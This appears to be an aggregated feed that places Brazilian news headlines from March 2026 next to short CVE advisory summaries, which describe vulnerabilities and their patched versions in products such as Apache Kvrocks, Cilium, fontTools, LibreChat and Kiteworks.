[28/03/2026 10:46] Governistas comemoram rejeição ao relatório da CPI do INSS; assista - Poder360

[28/03/2026 07:06] Houthis aliados do Irã atacam Israel e aumentam temores de expansão da guerra - BBC

[27/03/2026 12:51] Michelle diz vai ficar afastada da articulação política durante recuperação de Bolsonaro em prisão domiciliar - oglobo.globo.com

[28/03/2026 12:16] Fachin rejeita pedido de CPI do Crime Organizado para manter quebra de sigilo de empresa de Toffoli - g1.globo.com

[27/03/2026 18:57] Rodrigo Bacellar é preso novamente pela PF - O Antagonista

[28/03/2026 00:26] Zanin suspende realização de eleições indiretas para governador do Rio - Correio Braziliense

[28/03/2026 10:36] Brasil continuará a apoiar Bachelet ao cargo de secretária-geral da ONU, diz Lula - noticias.uol.com.br

[27/03/2026 15:09] Laudo revela motivo de surto de intoxicação em pizzaria da PB - Pleno.News

[28/03/2026 09:34] Lula aparece à frente de Flávio Bolsonaro entre eleitores de centro, diz Datafolha - Estadão

[28/03/2026 11:41] Ibaneis se emociona em missa de despedida ao deixar o cargo de governador - Correio Braziliense

[CVE-2025-51733] [Modified: 02-12-2025] [Analyzed] [V3.1 S5.5:MEDIUM] Cross-Site Request Forgery (CSRF) vulnerability in HCL Technologies Ltd. Unica 12.0.0.

[CVE-2025-51734] [Modified: 02-12-2025] [Analyzed] [V3.1 S5.4:MEDIUM] Cross-site scripting (XSS) vulnerability in HCL Technologies Ltd. Unica 12.0.0.

[CVE-2025-51735] [Modified: 02-12-2025] [Analyzed] [V3.1 S7.5:HIGH] CSV formula injection vulnerability in HCL Technologies Ltd. Unica 12.0.0.

[CVE-2025-51736] [Modified: 02-12-2025] [Analyzed] [V3.1 S6.3:MEDIUM] File upload vulnerability in HCL Technologies Ltd. Unica 12.0.0.

[CVE-2025-59790] [Modified: 04-12-2025] [Analyzed] [V3.1 S5.4:MEDIUM] Improper Privilege Management vulnerability in Apache Kvrocks. This issue affects Apache Kvrocks: from v2.9.0 through v2.13.0. Users are recommended to upgrade to version 2.14.0, which fixes the issue.

[CVE-2025-59792] [Modified: 04-12-2025] [Analyzed] [V3.1 S5.3:MEDIUM] Reveals plaintext credentials in the MONITOR command vulnerability in Apache Kvrocks. This issue affects Apache Kvrocks: from 1.0.0 through 2.13.0. Users are recommended to upgrade to version 2.14.0, which fixes the issue.

[CVE-2025-13683] [Modified: 18-12-2025] [Analyzed] [V3.1 S6.5:MEDIUM] Exposure of credentials in unintended requests in Devolutions Server, Remote Desktop Manager on Windows.This issue affects Devolutions Server: through 2025.3.8.0; Remote Desktop Manager: through 2025.3.23.0.

[CVE-2025-64715] [Modified: 04-12-2025] [Analyzed] [V3.1 S4.0:MEDIUM] Cilium is a networking, observability, and security solution with an eBPF-based dataplane. Prior to versions 1.16.17, 1.17.10, and 1.18.4, CiliumNetworkPolicys which use egress.toGroups.aws.securityGroupsIds to reference AWS security group IDs that do not exist or are not attached to any network interface may unintentionally allow broader outbound access than intended by the policy authors. In such cases, the toCIDRset section of the derived policy is not generated, which means outbound traffic may be permitted to more destinations than originally intended. This issue has been patched in versions 1.16.17, 1.17.10, and 1.18.4. There are no workarounds for this issue.

[CVE-2025-65112] [Modified: 03-12-2025] [Analyzed] [V3.1 S9.4:CRITICAL] PubNet is a self-hosted Dart & Flutter package service. Prior to version 1.1.3, the /api/storage/upload endpoint in PubNet allows unauthenticated users to upload packages as any user by providing arbitrary author-id values. This enables identity spoofing, privilege escalation, and supply chain attacks. This issue has been patched in version 1.1.3.

[CVE-2025-65113] [Modified: 03-12-2025] [Analyzed] [V3.1 S6.5:MEDIUM] ClipBucket v5 is an open source video sharing platform. Prior to version 5.5.2 - #164, an authorization bypass vulnerability in the AJAX flagging system allows any unauthenticated user to flag any content (users, videos, photos, collections) on the platform. This can lead to mass flagging attacks, content disruption, and moderation system abuse. This issue has been patched in version 5.5.2 - #164.

[CVE-2025-66027] [Modified: 03-12-2025] [Analyzed] [V3.1 S6.5:MEDIUM] Rallly is an open-source scheduling and collaboration tool. Prior to version 4.5.6, an information disclosure vulnerability exposes participant details, including names and email addresses through the /api/trpc/polls.get,polls.participants.list endpoint, even when Pro privacy features are enabled. This bypasses intended privacy controls that should prevent participants from viewing other users’ personal information. This issue has been patched in version 4.5.6.

[CVE-2025-66034] [Modified: 03-12-2025] [Analyzed] [V3.1 S6.3:MEDIUM] fontTools is a library for manipulating fonts, written in Python. In versions from 4.33.0 to before 4.60.2, the fonttools varLib (or python3 -m fontTools.varLib) script has an arbitrary file write vulnerability that leads to remote code execution when a malicious .designspace file is processed. The vulnerability affects the main() code path of fontTools.varLib, used by the fonttools varLib CLI and any code that invokes fontTools.varLib.main(). This issue has been patched in version 4.60.2.

[CVE-2025-66201] [Modified: 03-12-2025] [Analyzed] [V3.1 S8.1:HIGH] LibreChat is a ChatGPT clone with additional features. Prior to version 0.8.1-rc2, LibreChat is vulnerable to Server-side Request Forgery (SSRF), by passing specially crafted OpenAPI specs to its "Actions" feature and making the LLM use those actions. It could be used by an authenticated user with access to this feature to access URLs only accessible to the LibreChat server (such as cloud metadata services, through which impersonation of the server might be possible). This issue has been patched in version 0.8.1-rc2.

[CVE-2025-66219] [Modified: 19-12-2025] [Analyzed] [V3.1 S9.8:CRITICAL] willitmerge is a command line tool to check if pull requests are mergeable. In versions 0.2.1 and prior, there is a command Injection vulnerability in willitmerge. The vulnerability manifests in this package due to the use of insecure child process execution API (exec) to which it concatenates user input, whether provided to the command-line flag, or is in user control in the target repository. At time of publication, no known fix is public.

[CVE-2025-53896] [Modified: 02-12-2025] [Analyzed] [V3.1 S7.1:HIGH] Kiteworks MFT orchestrates end-to-end file transfer workflows. Prior to version 9.1.0, a bug in Kiteworks MFT could cause under certain circumstances that a user's active session would not properly time out due to inactivity. This issue has been patched in version 9.1.0.

[CVE-2025-53897] [Modified: 03-12-2025] [Analyzed] [V3.1 S6.8:MEDIUM] Kiteworks MFT orchestrates end-to-end file transfer workflows. Prior to version 9.1.0, this vulnerability could allow an external attacker to gain access to log information from the system by tricking an administrator into browsing a specifically crafted fake page of Kiteworks MFT. This issue has been patched in version 9.1.0.

[CVE-2025-53899] [Modified: 03-12-2025] [Analyzed] [V3.1 S7.2:HIGH] Kiteworks MFT orchestrates end-to-end file transfer workflows. Prior to version 9.1.0, the back-end of Kiteworks MFT is vulnerable to an incorrectly specified destination in a communication channel which allows an attacker with administrative privileges on the system under certain circumstances to intercept upstream communication which could lead to an escalation of privileges. This issue has been patched in version 9.1.0.

[CVE-2025-53900] [Modified: 03-12-2025] [Analyzed] [V3.1 S6.5:MEDIUM] Kiteworks MFT orchestrates end-to-end file transfer workflows. Prior to version 9.1.0, an unfavourable definition of roles and permissions in Kiteworks MFT on managing Connections could lead to unexpected escalation of privileges for authorized users. This issue has been patched in version 9.1.0.

[CVE-2025-53939] [Modified: 04-12-2025] [Analyzed] [V3.1 S6.3:MEDIUM] Kiteworks is a private data network (PDN). Prior to version 9.1.0, improper input validation when managing roles of a shared folder could lead to unexpectedly elevate another user's permissions on the share. This issue has been patched in version 9.1.0.

[CVE-2025-58436] [Modified: 04-12-2025] [Analyzed] [V3.1 S5.1:MEDIUM] OpenPrinting CUPS is an open source printing system for Linux and other Unix-like operating systems. Prior to version 2.4.15, a client that connects to cupsd but sends slow messages, e.g. only one byte per second, delays cupsd as a whole, such that it becomes unusable by other clients. This issue has been patched in version 2.4.15.